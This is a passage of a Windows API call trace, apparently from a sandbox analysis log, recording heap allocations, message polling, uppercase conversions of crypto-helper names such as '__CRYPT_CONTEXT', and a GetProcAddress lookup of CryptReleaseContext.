wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0141.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0141.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0141.730] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0141.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0141.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0141.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0141.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0141.731] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0141.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0141.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0141.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0141.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0141.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0141.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0141.733] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0141.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0141.734] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0141.734] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0141.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0141.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0141.734] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0141.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0141.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0141.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0141.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0141.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0141.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0141.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0141.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0141.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0141.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0141.735] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0141.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0141.735] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0141.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0141.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0141.736] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0141.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0141.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0141.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0141.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0141.736] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0141.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0141.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0141.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0141.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0141.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0141.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0141.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0141.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0141.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0141.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0141.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0141.736] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0141.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0141.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0141.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0141.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0141.737] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0141.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0141.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0141.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0141.737] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0141.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0141.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0141.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0141.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0141.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0141.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0141.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0141.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0141.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0141.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0141.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0141.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0141.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0141.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0141.738] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0141.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0141.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0141.738] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0141.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0141.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0141.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0141.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0141.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0141.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0141.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0141.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0141.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0141.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0141.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0141.739] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0141.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0141.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0141.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0141.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0141.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0141.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0141.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0141.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0141.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0141.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0141.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0141.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0141.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0141.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0141.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0141.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0141.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0141.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0141.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0141.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0141.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0141.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0141.741] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0141.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0141.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0141.741] RtlAllocateHeap 